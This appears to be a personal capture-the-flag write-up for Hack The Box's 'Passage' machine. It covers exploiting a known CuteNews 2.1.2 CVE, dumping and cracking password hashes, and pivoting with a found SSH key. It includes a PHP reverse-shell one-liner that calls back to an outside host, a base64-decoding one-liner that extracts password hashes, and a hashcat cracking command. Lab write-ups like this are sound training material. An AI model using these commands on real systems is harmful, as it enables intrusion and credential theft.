🚒Passage

https://app.hackthebox.com/machines/Passage

We find 2 TCP ports open:

On the web page we see the follwoing information ->

Fail 2 ban is an anti brute force software:

So basically with a gobuster I got my IP banned so i'm going to be cautious when it comes to finding subdirectories

through enumeration, i find that it's CuteNews 2.1.2 running with a known CVE ->

Very straightforward CVE

We see some PHP files

So with a quick PHP reverse shell ->

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

We get a more stable shell

after enumerating a bit, we find where is stored the flat files that are used by cuteCMS as a "database"

so we see this is base64 encoded:

After looking up a write-up to see how a pro would go quick to go through all of this, i found this crazy one-liner that got me thinking i should start learning those:

for f in *; do cat $f | grep -v 'php die'; echo; done | grep . | while read line; do echo $line | base64 -d; echo; done | grep '"pass"'

explanation:

  1. Loop Over Files:

    for f in *; do

    This loop iterates over all files in the current directory (using * to match all filenames).

  2. Process Each File:

    cat $f | grep -v 'php die'; echo;

    For each file, it:

    • Uses cat $f to read the content of the file.

    • Pipes the content to grep -v 'php die', which filters out any lines containing the string 'php die'.

    • Uses echo to add a newline after processing each file.

  3. Concatenate and Filter Non-Empty Lines:

    done | grep . |

    After processing all files, done ends the loop. The output is then piped to grep ., which filters out any empty lines (only lines containing at least one character are kept).

  4. Read and Decode Each Line:

    while read line; do echo $line | base64 -d; echo; done |

    This while loop reads each non-empty line:

    • read line reads a line into the variable line.

    • echo $line | base64 -d decodes the line from base64 encoding.

    • echo adds a newline after each decoded line.

Since we looked at the home directory and saw a paul user, we could guess that this user is the pivoting path, so i added a grep "paul" to the oneliner as a part of contribution

took this hash and looked it up and saw it was mode 1400 on hashcat ->

hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt

I could not change user with my low interaction shell so i did a tty upgrade ->

and we connect

We quickly find an ssh authorization key:

We copy the id_rsa key and connect to nadav user ->

We'll get root tomorrow

PreviousPCNextMagic

Last updated